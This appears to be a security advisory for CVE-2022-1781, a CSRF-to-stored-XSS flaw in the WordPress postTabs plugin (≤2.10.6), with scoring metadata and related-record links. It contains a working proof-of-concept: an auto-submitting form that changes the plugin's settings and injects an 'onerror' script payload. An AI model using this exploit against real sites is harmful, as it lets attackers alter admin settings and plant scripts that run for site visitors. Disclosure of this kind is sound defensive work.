Lucene search
Daniel RufWPEX-ID:7F2AE2C9-57D4-46A0-A9A1-585EC543B153HistoryMay 23, 2022 - 12:00 a.m.
postTabs <= 2.10.6 - Arbitrary Settings Update via CSRF to Stored XSS
2022-05-2300:00:00
Daniel Ruf
72
0.001 Low
EPSS
Percentile
21.2%
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack, which also lead to Stored Cross-Site Scripting due to the lack of sanitisation and escaping
<form id="test" action="https://example.com/wp-admin/options-general.php?page=postTabs.php" method="POST">
<input type="text" name="line" value="#fff">
<input type="text" name="active_font" value="#fff">
<input type="text" name="active_bg" value="#fff">
<input type="text" name="over_font" value="#fff">
<input type="text" name="over_bg" value="#fff">
<input type="text" name="inactive_font" value="#fff">
<input type="text" name="inactive_bg" value="#fff">
<input type="text" name="align" value="left">
<input type="text" name="TOC_title" value='"><img src=x onerror=alert(/XSS/)>'>
<input type="text" name="TOC" value="END">
<input type="text" name="list_link" value="hideshow">
<input type="text" name="single_link" value="hideshow">
<input type="text" name="cookies" value="1">
<input type="text" name="show_perma" value="never">
<input type="text" name="submit_postTab" value="Update Settings ยป">
</form>
<script>
document.getElementById("test").submit();
</script>Related
cve
cve
CVE-2022-1781
2022-06-13 13:15:12
nvd
nvd
CVE-2022-1781
2022-06-13 13:15:12
cnvd
cnvd
WordPress postTabs plugin cross-site request forgery vulnerability
2022-06-15 00:00:00
prion
prion
Cross site scripting
2022-06-13 13:15:00
cvelist
cvelist
patchstack
patchstack
wpvulndb
wpvulndb
postTabs <= 2.10.6 - Arbitrary Settings Update via CSRF to Stored XSS
2022-05-23 00:00:00